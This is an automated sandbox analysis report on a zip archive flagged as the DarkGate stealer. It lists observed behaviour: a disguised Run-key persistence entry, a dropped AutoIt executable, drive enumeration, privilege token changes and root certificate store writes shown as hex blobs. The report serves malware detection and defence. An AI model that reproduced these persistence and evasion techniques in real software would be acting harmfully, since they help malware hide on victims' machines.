Malware Analysis Report

2024-11-15 07:17

Sample ID 231117-y12dfseg9t
Target New Compressed (zipped) Folder.zip
SHA256 9e8edbacb53fe27d3723151ab2d6ed203473edf666caebfab7dbf442bd68d463
Tags
darkgate a11111 persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9e8edbacb53fe27d3723151ab2d6ed203473edf666caebfab7dbf442bd68d463

Threat Level: Known bad

The file New Compressed (zipped) Folder.zip was found to be: Known bad.

Malicious Activity Summary

darkgate a11111 persistence stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

DarkGate

Blocklisted process makes network request

Downloads MZ/PE file

Requests dangerous framework permissions

Executes dropped EXE

Loads dropped DLL

Enumerates connected drives

Adds Run key to start application

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

Checks processor information in registry

Modifies data under HKEY_USERS

Enumerates system info in registry

Modifies system certificate store

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-17 20:16

Signatures

Requests dangerous framework permissions

Description Indicator Process Target
Allows an application to write to external storage. android.permission.WRITE_EXTERNAL_STORAGE N/A N/A
Allows an application to read from external storage. android.permission.READ_EXTERNAL_STORAGE N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-17 20:15

Reported

2023-11-17 20:21

Platform

win10-20231025-en

Max time kernel

273s

Max time network

314s

Command Line

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

Signatures

DarkGate

stealer darkgate

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\tepp\AutoIt3.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\BraveCrashHandler.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI5594.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e58efba.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF150.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF366.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3EEE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e58efba.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF422.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{1C305533-9700-4743-83AA-EEF0896C4929} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF54C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF628.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF986.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7EF7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI68FD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF2D8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF723.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF956.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1879.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\tepp\AutoIt3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\tepp\AutoIt3.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133447259646841693" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob = 190000000100000010000000683f58e5528121a89cf21532e700535f030000000100000014000000743af0529bd032a0f44a83cdd4baa97b7c2ec49a1d000000010000001000000056073d58ce8c0d7b5056f74735db0b62140000000100000014000000f960bbd4e3d534f6b8f5068025a773db4669a89e6200000001000000200000002e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c09000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080b000000010000005e000000530053004c002e0063006f006d00200045005600200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900200052005300410020005200320000005300000001000000850000003081823022060c2b0601040182a9300103010430123010060a2b0601040182373c0101030200c03022060c2b0601040182a9300103030230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000020000000cf1152c4bfbd96b6d381b61e0c66e7a74b1185518120396449abe53aaadf640b2000000001000000ef050000308205eb308203d3a003020102020856b629cd34bc78f6300d06092a864886f70d01010b0500308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f7269747920525341205232301e170d3137303533313138313433375a170d3432303533303138313433375a308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f726974792052534120523230820222300d06092a864886f70d01010105000382020f003082020a02820201008f366540e1d64dc0d7b4e946da6bea3347cd4cf97d7dbebd2d3df0db78e186a5d9ba095768ed573ea0d0084183e72841241fe37215d0011afb5e7023b2cb9f39e3cfc54ec6926d26c67bbbb3da279d0a86e9813705fef07171ecc31ce963a217149def1b67d385550202d649c9cc5ae1b1f76f329fc9d43b8841a89cbdcbabdb6d7b091fa24c7290da2b08fccf3c54ce670fa8cf5d96190bc4e372ebadd17d1d27ef92eb10bf5beb3bafcf80ddc1d296045b7a7ea4a93c3876a4628ea0395eea77cf5d00598f662c3e07a2a30526116997ea85b70f960b4bc840e150ba2e8acbf70f9a22e77f9a3713cdf24d136b21d1c0cc22f2a146f644699cca613507006fd6610811eabab8f6e9b360e54db9ec9f1466c95758dbcd8769f88a86120347bf661376ac777d34248583cdd7aa9c901a9f212c7f78b764b8d8e8a6f478b355cb84d232c478aea38f61ddce0853adec88fc15e49a0de69f1a77ce4c8fb814153d629c863806006612e459765a53c00298a2102b68447b8e79ce334a76aa5b81161bb58ad8d0007b5e62b409d686630ea6059549ba288b8893b2341cd8a4556eb71cd0de99553b23f422e0f9296626ec205077db4a0b8fbee5026070415ed4ae5039221426cbb23b7374554707798139a8301344e5048aae961325420fb953c49bfccde41cde3cfaabd6064a1f67a698301cdd2cdbdc18955766c6ff5c8b56f5770203010001a3633061300f0603551d130101ff040530030101ff301f0603551d23041830168014f960bbd4e3d534f6b8f5068025a773db4669a89e301d0603551d0e04160414f960bbd4e3d534f6b8f5068025a773db4669a89e300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010056b38ecb0a9d498ebfa4c491bb661705519875fbe5502c7a9ef114faabd38a3eff91298f638bd8b4a954010dbe93862ff94a6dc75ef557f9ca551c12be470f36c5df6ab7db75c247257fb9f163f8682d5504d1f28db0a4cfbc3c5e1f78e7a5a02070b004c5b7f772a7de220dbd3325468c649226e33e2e6396da9b8c3df81809d703cc7d8682e0ca04075150d7ff92d50cefda869f99d7ebb7af68e2392694ba68b7bf83d3ea7a673d6267ae25e572e8e2e4ecae12f64b2b3c9fe9b040f33854b3fdb768c8dac68f513cb2fb91dc1ce79b9de1b70d728fe2a4c4a978f9eb14acc64305c26539281802c382b29d05be65ed965f65743cfb09352e7b9c13fd1b0f5dc76d813a560fcc3be1af022f22ac46ca463ca01c4cd644b45e2e5c156609e12629fec65261bab173ffc30c9ce56c6a943f14ca40169584f359a9ac5f4c61936dd13bcca2950c22a66767442eb9d9d28a41b3660b5afb7d23a5f21ab0ffde9b83942ed13fdf92b791af053b65c7a06cb1cd6212c3901be325ce34bc6f7776b110c3f7051ac0d6af7462481777926990611cde958074548f181cc3f303d0bfa443758653187a0a2e091c369f91fd828a224bd10e5025ddcb030c17c98300084e354d8a8bedf00294662c447fcb95279617ad0930acb671176e8b17f61c09d42d3b98a571d35413d960f3f54b664ffaf1ee20128db4ac57b14563a1ac76a9c2fb C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A C:\Windows\System32\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob = 0f0000000100000020000000cf1152c4bfbd96b6d381b61e0c66e7a74b1185518120396449abe53aaadf640b5300000001000000850000003081823022060c2b0601040182a9300103010430123010060a2b0601040182373c0101030200c03022060c2b0601040182a9300103030230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000005e000000530053004c002e0063006f006d00200045005600200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100200052003200000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000002e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c140000000100000014000000f960bbd4e3d534f6b8f5068025a773db4669a89e1d000000010000001000000056073d58ce8c0d7b5056f74735db0b62030000000100000014000000743af0529bd032a0f44a83cdd4baa97b7c2ec49a2000000001000000ef050000308205eb308203d3a003020102020856b629cd34bc78f6300d06092a864886f70d01010b0500308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f7269747920525341205232301e170d3137303533313138313433375a170d3432303533303138313433375a308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f726974792052534120523230820222300d06092a864886f70d01010105000382020f003082020a02820201008f366540e1d64dc0d7b4e946da6bea3347cd4cf97d7dbebd2d3df0db78e186a5d9ba095768ed573ea0d0084183e72841241fe37215d0011afb5e7023b2cb9f39e3cfc54ec6926d26c67bbbb3da279d0a86e9813705fef07171ecc31ce963a217149def1b67d385550202d649c9cc5ae1b1f76f329fc9d43b8841a89cbdcbabdb6d7b091fa24c7290da2b08fccf3c54ce670fa8cf5d96190bc4e372ebadd17d1d27ef92eb10bf5beb3bafcf80ddc1d296045b7a7ea4a93c3876a4628ea0395eea77cf5d00598f662c3e07a2a30526116997ea85b70f960b4bc840e150ba2e8acbf70f9a22e77f9a3713cdf24d136b21d1c0cc22f2a146f644699cca613507006fd6610811eabab8f6e9b360e54db9ec9f1466c95758dbcd8769f88a86120347bf661376ac777d34248583cdd7aa9c901a9f212c7f78b764b8d8e8a6f478b355cb84d232c478aea38f61ddce0853adec88fc15e49a0de69f1a77ce4c8fb814153d629c863806006612e459765a53c00298a2102b68447b8e79ce334a76aa5b81161bb58ad8d0007b5e62b409d686630ea6059549ba288b8893b2341cd8a4556eb71cd0de99553b23f422e0f9296626ec205077db4a0b8fbee5026070415ed4ae5039221426cbb23b7374554707798139a8301344e5048aae961325420fb953c49bfccde41cde3cfaabd6064a1f67a698301cdd2cdbdc18955766c6ff5c8b56f5770203010001a3633061300f0603551d130101ff040530030101ff301f0603551d23041830168014f960bbd4e3d534f6b8f5068025a773db4669a89e301d0603551d0e04160414f960bbd4e3d534f6b8f5068025a773db4669a89e300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010056b38ecb0a9d498ebfa4c491bb661705519875fbe5502c7a9ef114faabd38a3eff91298f638bd8b4a954010dbe93862ff94a6dc75ef557f9ca551c12be470f36c5df6ab7db75c247257fb9f163f8682d5504d1f28db0a4cfbc3c5e1f78e7a5a02070b004c5b7f772a7de220dbd3325468c649226e33e2e6396da9b8c3df81809d703cc7d8682e0ca04075150d7ff92d50cefda869f99d7ebb7af68e2392694ba68b7bf83d3ea7a673d6267ae25e572e8e2e4ecae12f64b2b3c9fe9b040f33854b3fdb768c8dac68f513cb2fb91dc1ce79b9de1b70d728fe2a4c4a978f9eb14acc64305c26539281802c382b29d05be65ed965f65743cfb09352e7b9c13fd1b0f5dc76d813a560fcc3be1af022f22ac46ca463ca01c4cd644b45e2e5c156609e12629fec65261bab173ffc30c9ce56c6a943f14ca40169584f359a9ac5f4c61936dd13bcca2950c22a66767442eb9d9d28a41b3660b5afb7d23a5f21ab0ffde9b83942ed13fdf92b791af053b65c7a06cb1cd6212c3901be325ce34bc6f7776b110c3f7051ac0d6af7462481777926990611cde958074548f181cc3f303d0bfa443758653187a0a2e091c369f91fd828a224bd10e5025ddcb030c17c98300084e354d8a8bedf00294662c447fcb95279617ad0930acb671176e8b17f61c09d42d3b98a571d35413d960f3f54b664ffaf1ee20128db4ac57b14563a1ac76a9c2fb C:\Windows\System32\WScript.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A
N/A N/A C:\tepp\AutoIt3.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe N/A
